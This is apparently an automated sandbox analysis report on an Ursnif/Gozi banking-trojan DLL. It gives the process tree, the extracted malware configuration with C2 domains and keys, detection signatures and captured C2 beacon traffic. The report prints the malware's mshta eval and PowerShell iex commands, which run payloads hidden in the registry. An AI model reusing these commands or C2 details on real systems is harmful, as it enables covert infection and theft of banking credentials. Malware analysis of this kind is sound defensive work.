Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3a94.dll

Overview

General Information

Sample Name:3a94.dll
Analysis ID:444316
MD5:3a943173c6de419b7078e88c20997838
SHA1:56567824c6b5c62112a74daa7a1a66e2ec0505d3
SHA256:af98c908f45b6b7893b8cc3121517488c94a93d015af71cd86f8269a971a8836
Tags:dllgozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4632 cmdline: loaddll32.exe 'C:\Users\user\Desktop\3a94.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 4196 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5652 cmdline: rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5444 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3336 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5528 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 996 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Time MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 4580 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6424 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5936 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2264 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1384 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.53494a0.2.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Encoded IEXShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384
              Sigma detected: MSHTA Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384
              Sigma detected: Mshta Spawning Windows ShellShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000005.00000003.347281616.0000000002810000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: 3a94.dllReversingLabs: Detection: 68%
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046139C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_046139C5
              Source: 3a94.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
              Source: 3a94.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdb source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdbXP source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdbXP source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp
              Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3a94.dll
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdb source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49717 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49717 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49720 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49720 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49722 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49722 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49730 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49730 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49734 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49734 -> 165.232.183.49:80
              Source: Joe Sandbox ViewASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
              Source: global trafficHTTP traffic detected: GET /OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /kXu9tnPyh7IrxOnM_/2F5RL9McC0pC/V4JAp24MS7Z/JdKAzMH5afqP6U/5QKmnqIf4ji_2F0bYULim/Ln9m9S8CJYQHSAL8/9V4ln6b18wizYxs/lBvgnWHKscbAmpSE6F/UvyDHh12X/4KiHWavyPolIq4enzVWO/gZBgK_2BixX_2FpKOLN/j_2FfrEitBIUH8MDLOcNHJ/NhB576j_2Fx2n/eQ5OwroG/raMZRrL38_2FMqHXUW7maRX/ilf2Nc3TMF/dkY1WHkQs6cMiRoJ2/AWmEChw_2BA5/L5BFJV5SVgy/cNqd1hVvvZotyw/XPfvzeOgszjC/s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
              Source: global trafficHTTP traffic detected: GET /6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
              Source: unknownDNS traffic detected: queries for: gtr.antoinfer.com
              Source: unknownHTTP traffic detected: POST /xJvow4_2/BJDMWjUnNijevmUW57WQQAD/EfF5Sspcyc/NJzdVTwdvpiYxkuku/nPGWvkA08XkQ/vBCHroC_2FE/9zehC8tkQdIdvs/O6XnkCJmSqv_2BmOlhbVu/HQOKlqimRyOan0Iq/gsEUxPO_2FhQGh0/jcvQ1wIS8Gsr9_2FfD/7E8mUZJ_2/BsH5YpBp8iAwhSj0WpLx/lHUKRpbxx3m_2BkZ1XY/A4clpRwWuRrbu_2BeomIJB/3Z5OAlfx3ZfTa/Zr5HnaAB/X29Vmpecpgs5PpmOqAd16fZ/L2jQuizAg_/2BSqqpGpXSe3rgahN/25lGwyN_2BXg/x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 2Host: todo.faroin.at
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:52:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
              Source: {166D056A-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.drString found in binary or memory: http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrj
              Source: {166D0568-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr, ~DF6EAF3ABE87705E33.TMP.20.drString found in binary or memory: http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCe
              Source: {1D3BDB90-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.drString found in binary or memory: http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000001D.00000002.492071617.000001F1AF661000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

              E-Banking Fraud:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
